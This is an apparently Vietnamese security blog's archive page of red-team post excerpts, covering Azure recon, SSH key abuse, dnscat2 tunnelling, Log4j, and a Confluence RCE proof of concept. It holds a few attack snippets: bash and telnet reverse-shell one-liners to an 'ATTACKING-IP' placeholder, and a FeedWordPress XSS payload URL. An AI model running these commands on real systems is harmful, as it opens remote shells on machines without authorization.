Category Archives: Hacking & RED TEAM

Azure Redteam Cheatsheet

“Mọi kiến thức trong bài viết chỉ phục vụ mục đích giáo dục và an toàn thông tin.Không được sử dụng để tấn công hệ thống mà bạn không sở hữu hoặc không được phép kiểm thử.” I. Reconnaissance (external) Update useful tool: https://github.com/nyxgeek/o365recon Find the subdomain of the target Using microBurst . \Invoke-EnumerateAzureSubDomains.ps1 Invoke-EnumerateAzureSubDomainsContinueContinue reading “Azure Redteam Cheatsheet”

[CVE-2021-25055] FeedWordPress < 2022.0123- Cross-Site Scripting (Authenticated)

# Referrer: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25055https://wpscan.com/vulnerability/7ed050a4-27eb-4ecb-9182-1d8fa1e71571# Version: 1.0# Tested on: Windows 10 + XAMPP v3.2.4POC: http://localhost/wordpress/wp-admin/admin.php?page=feedwordpress/syndication.php&visibility='”><img+src=2+onerror=alert(origin)&gt;

DANH SÁCH LỖ HỔNG NGHIÊM TRỌNG của TELERIK UI

Telerik là một công ty Bungari cung cấp các công cụ phần mềm (UI) cho web, điện thoại di động, phát triển ứng dụng máy tính để bàn, các công cụ và dịch vụ thuê bao cho cross-platform phát triển ứng dụng. Telerik UI là một thư viện phổ biến chuyên phát triển giao diệnContinueContinue reading “DANH SÁCH LỖ HỔNG NGHIÊM TRỌNG của TELERIK UI”

Abusing SSH Access using private keys

“Mọi kiến thức trong bài viết chỉ phục vụ mục đích giáo dục và an toàn thông tin.Không được sử dụng để tấn công hệ thống mà bạn không sở hữu hoặc không được phép kiểm thử.” Step 1: Create ssh-keygen file ssh-keygen Step 2: Copy file id_rsa to /ftp_home/.ssh/authorized_keys via FTP or someway 🙂ContinueContinue reading “Abusing SSH Access using private keys”

Using dnscat2 for tunneling bypass Firewall Outbound

“Mọi kiến thức trong bài viết chỉ phục vụ mục đích giáo dục và an toàn thông tin.Không được sử dụng để tấn công hệ thống mà bạn không sở hữu hoặc không được phép kiểm thử.” Step 1: Check outbound internet availability Step 2: Install dnscat2 by your way (Use this if you don’tContinueContinue reading “Using dnscat2 for tunneling bypass Firewall Outbound”

Lỗ hổng Log4j CVE-2021-44228

Giới thiệu Gần đây, một lỗ hổng phần mềm rất nghiêm trọng đã được công bố. Nó có mã định danh CVE-2021-44228 (log4shell). Lỗ hổng đã làm cộng đồng nghiên cứu bảo mật nói chung và cộng đồng những nhà phát triển Java nói riêng dậy sóng. Nguyênnhân nằm ở sự phổ biến của thưContinueContinue reading “Lỗ hổng Log4j CVE-2021-44228”

Reverse Shell Cheat Sheet (Backconnect)

“Mọi kiến thức trong bài viết chỉ phục vụ mục đích giáo dục và an toàn thông tin.Không được sử dụng để tấn công hệ thống mà bạn không sở hữu hoặc không được phép kiểm thử.” Bash Reverse Shell bash -i >& /dev/tcp/ATTACKING-IP/80 0>&1 Telnet Reverse Shell telnet ATTACKING-IP 80 | /bin/bash | telnetContinueContinue reading “Reverse Shell Cheat Sheet (Backconnect)”

EVABSv4 write up [Part 1]

Đây là một lab về tấn công ứng dụng android cho những người mới bắt đầu pentest file apk. Người xây dựng lab này muốn giới thiệu cho những người mới bắt đầu với kiến thức hạn chế hoặc không biết về một số lỗ hổng trong ứng dụng Android. EVABS cung cấp các thửContinueContinue reading “EVABSv4 write up [Part 1]”

CVE-2021-26084-PoC Remote Code Execution vulnerability in Confluence Server

“Mọi kiến thức trong bài viết chỉ phục vụ mục đích giáo dục và an toàn thông tin.Không được sử dụng để tấn công hệ thống mà bạn không sở hữu hoặc không được phép kiểm thử.” PoC test SSTI POST /pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1 Host: <snip> User-Agent: <snip> Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding:ContinueContinue reading “CVE-2021-26084-PoC Remote Code Execution vulnerability in Confluence Server”